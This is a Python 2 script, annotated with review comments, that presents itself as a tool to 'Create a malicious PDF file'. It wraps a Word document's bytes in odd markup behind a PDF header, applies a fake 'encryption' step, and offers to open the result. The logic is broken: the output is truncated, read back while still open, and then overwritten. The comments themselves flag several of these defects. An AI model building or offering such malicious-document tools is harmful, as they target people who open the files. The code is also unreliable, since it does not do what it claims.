from PyPDF2 import PdfFileWriter, PdfFileReader
from binascii import a2b_hex
import os
import re
import argparse

# Replaces one line of a text file in place.
#
#   file_name -- path of the text file to rewrite.
#   line_num  -- 0-based index of the line to replace; negative indices count
#                from the end, as with any list.
#   new_line  -- replacement text, written verbatim. No newline is appended,
#                so the caller must include one if the line should end with it.
#
# Raises IndexError when line_num is outside the file's line range; the file
# is left untouched in that case because it is only reopened for writing after
# the replacement succeeded in memory.
def replace_line(file_name, line_num, new_line):
    # Read everything and close the handle before reopening for writing, so
    # no descriptor is left dangling and read-only access is enough here.
    with open(file_name, 'r') as src:
        lines = src.readlines()
    lines[line_num] = new_line
    # The context manager guarantees the file is closed (and flushed) even if
    # writelines() raises part-way through.
    with open(file_name, 'w') as out:
        out.writelines(lines)

# Splits `password` into two-character chunks and joins them with '00'.
#
#   password      -- string to split.
#   format_length -- when equal to 64, one extra trailing '00' is appended.
#
# The final chunk is always the last two characters of `password`, so an
# odd-length input repeats one character (e.g. 'abcde' -> 'ab00cd00de').
# Inputs shorter than three characters are returned as they are.
def extract_hex_bytes(password, format_length):
    # Leading chunks: every even offset that starts before the final pair.
    chunks = [password[pos:pos + 2] for pos in range(0, len(password) - 2, 2)]
    chunks.append(password[-2:])
    joined = '00'.join(chunks)
    if format_length == 64:
        return joined + '00'
    return joined

# Copies the first page of `pdf_file` into a new PyPDF2 writer, encrypts it
# with `ps`, and writes the result to `pdf_name`.
#
#   ps       -- password string handed to PdfFileWriter.encrypt().
#   key      -- second string; only used to build the text passed to
#               replace_line() below.
#   pdf_file -- input handed to PdfFileReader (main() passes a path).
#   pdf_name -- path that is edited by replace_line() and then overwritten.
#
# Only page 0 is copied; any further pages of the input are dropped.
def encrypt_file(ps, key, pdf_file, pdf_name):
    pdf_writer = PdfFileWriter()
    pdf_reader = PdfFileReader(pdf_file)
    pdf_writer.addPage(pdf_reader.getPage(0))

    # Despite the names, these are not encrypted values: extract_hex_bytes()
    # only re-chunks the input strings with '00' separators.
    encrypted_ps = extract_hex_bytes(ps, len(ps))
    encrypted_key = extract_hex_bytes(key, len(key))

    # Overwrite the line at index 6 (the seventh line, not the third) of
    # pdf_name with an '/Encrypt {...} {...} R' string.
    # NOTE(review): replace_line() opens the file in text mode and raises
    # IndexError if it has fewer than seven lines. Its result is also
    # discarded, because pdf_name is reopened with 'wb' (which truncates)
    # just below -- confirm whether this call is still wanted.
    replace_line(pdf_name, 6, '/Encrypt {' + encrypted_ps + '} {' + encrypted_key + '} R')

    # Encrypt with `ps` and write the single-page document to pdf_name,
    # replacing whatever the file held before.
    pdf_writer.encrypt(ps)
    with open(pdf_name, 'wb') as f:
        pdf_writer.write(f)

# Converts a sequence of byte values to a lowercase hexadecimal string.
#
#   ps -- indexable sequence of integers in 0..255 (bytes, bytearray, or a
#         list of ints). Each value becomes exactly two hex digits.
#
# Returns the concatenated hex digits, or '' for an empty sequence.
# Raises IndexError for a value above 255 and TypeError for non-integer
# items (e.g. the characters of a text string).
def str_to_hex(ps):
    hex_digits = '0123456789abcdef'
    pairs = []
    for value in ps:
        # divmod uses floor division, so the high nibble is an int on both
        # Python 2 and Python 3 (plain '/' yields a float on Python 3, which
        # cannot be used as an index).
        high, low = divmod(value, 16)
        pairs.append(hex_digits[high] + hex_digits[low])
    return ''.join(pairs)

# Returns `pdf_file` with a '.pdf' extension.
#
# A name that already ends in '.pdf' (case-sensitive) is returned unchanged.
# Otherwise the last extension, if any, is replaced by '.pdf'.
def find_pdf_name(pdf_file):
    if pdf_file.endswith('.pdf'):
        return pdf_file
    stem = os.path.splitext(pdf_file)[0]
    return stem + '.pdf'

# Command-line entry point: builds the output file, prompts for a password
# and key, passes the file to encrypt_file(), and optionally opens it.
#
# NOTE(review): raw_input() exists only on Python 2, so this function does
# not run on Python 3 as written.
def main():
    parser = argparse.ArgumentParser(description='Create a malicious PDF file.')
    parser.add_argument('-o', '--output', type=str, help='The output file name.', default='malicious.pdf')
    args = parser.parse_args()
    # Force a '.pdf' extension on the requested output name.
    pdf_name = find_pdf_name(args.output)
    with open(pdf_name, 'wb') as f:
        # Header bytes: '%PDF-1.6\r\n%(c)'.
        f.write(a2b_hex('255044462d312e360d0a25286329'))
        # NOTE(review): this reads the same path that is open for writing
        # (and was just truncated) a few lines above. What comes back depends
        # on whether the header write has been flushed yet -- presumably
        # empty or header-only. The handle is also never closed explicitly.
        pdf = open(pdf_name, 'rb').read()
        # Raw contents of 'msword.doc', resolved against the current working
        # directory; raises if the file is missing. The handle is not closed
        # explicitly.
        word = open('msword.doc', 'rb').read()
        # Opening marker (47 bytes):
        # '<budpdate>\r\n<x<font color="user >\r\n<budpdate>\r\n'.
        f.write(a2b_hex('3c62756470646174653e0d0a3c783c666f6e7420636f6c6f723d2275736572203e0d0a3c62756470646174653e0d0a'))
        # The .doc bytes follow the marker unmodified.
        f.write(word)
        # Closing marker: '\r\n</font>\r\n</budpdate>'.
        f.write(a2b_hex('0d0a3c2f666f6e743e0d0a3c2f62756470646174653e'))
        # Append whatever `pdf` holds beyond the opening marker's length;
        # this is empty whenever `pdf` is shorter than 47 bytes.
        f.write(pdf[len(a2b_hex('3c62756470646174653e0d0a3c783c666f6e7420636f6c6f723d2275736572203e0d0a3c62756470646174653e0d0a')):])

    # Prompt for the password (echoed to the terminal as typed).
    ps = raw_input("Enter your password: ")
    # Prompt for the key.
    key = raw_input("Enter your key: ")

    # The same path serves as both input and output, so encrypt_file()
    # overwrites the file written above.
    encrypt_file(ps, key, pdf_name, pdf_name)

    # Keep asking until the answer is Y or N (case-insensitive).
    while True:
        choice = raw_input("Would you like to open the malicious pdf now? [Y/N]: ")
        if choice.upper() == 'Y':
            # NOTE(review): os.startfile() is documented as Windows-only;
            # on other platforms this raises AttributeError.
            os.startfile(pdf_name)
            break
        elif choice.upper() == 'N':
            print("Exiting Program...")
            break
        else:
            print("Invalid entry.")

# Run main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()

# educational purposes only